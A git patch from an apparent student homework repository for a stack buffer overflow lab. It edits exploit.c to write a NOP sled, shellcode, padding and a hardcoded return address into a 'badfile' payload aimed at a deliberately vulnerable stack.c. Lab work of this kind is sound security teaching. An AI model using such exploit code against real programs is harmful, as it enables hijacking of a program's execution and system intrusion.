From eb27487128877705ff1407c31fec1a705847b997 Mon Sep 17 00:00:00 2001 From: Alex Huddleston Date: Tue, 13 Feb 2018 23:18:43 -0600 Subject: [PATCH] Works with gdb in the included VM. --- hw2/badfile | Bin 517 -> 517 bytes hw2/exploit.c | 10 ++++++++-- hw2/stack.c | 2 +- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/hw2/badfile b/hw2/badfile index d644f843d93a7fbe7189085c6f7ef985b858c7cc..fa315c7ebb6a8c6dbeb00c35e36fed7e91c4e7c0 100644 GIT binary patch literal 517 zcmbO*0TulC^nX7CvXJ3{fDHYr;*1Raq|Cg|#{t2e4`*)RKHK0(BtS6?+2B$3pa}s0 DNrMz; literal 517 mcmXp!5Rjo?Rh*HbpOl%``8XiB^Wn@5+-DmYCX9j+69NEeNFV0_ diff --git a/hw2/exploit.c b/hw2/exploit.c index 6f0c834..362325d 100755 --- a/hw2/exploit.c +++ b/hw2/exploit.c @@ -27,9 +27,15 @@ int main(int argc, char **argv) /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); - + /* You need to fill the buffer with appropriate contents here */ - strcpy(buffer, shellcode); + + // Inject the shellcode into the buffer. + strcpy(&buffer[33], shellcode); + // Padding... + strcpy(&buffer[57], "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); + // Point ebp register to the injected code. + strcpy(&buffer[16], "\xf8\xf2\xff\xbf"); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); diff --git a/hw2/stack.c b/hw2/stack.c index 4fba173..dcc06d3 100755 --- a/hw2/stack.c +++ b/hw2/stack.c @@ -15,7 +15,7 @@ int bof(char *str) return 1; } -void main(int argc, char **argv) +int main(int argc, char **argv) { char str[517]; FILE *badfile;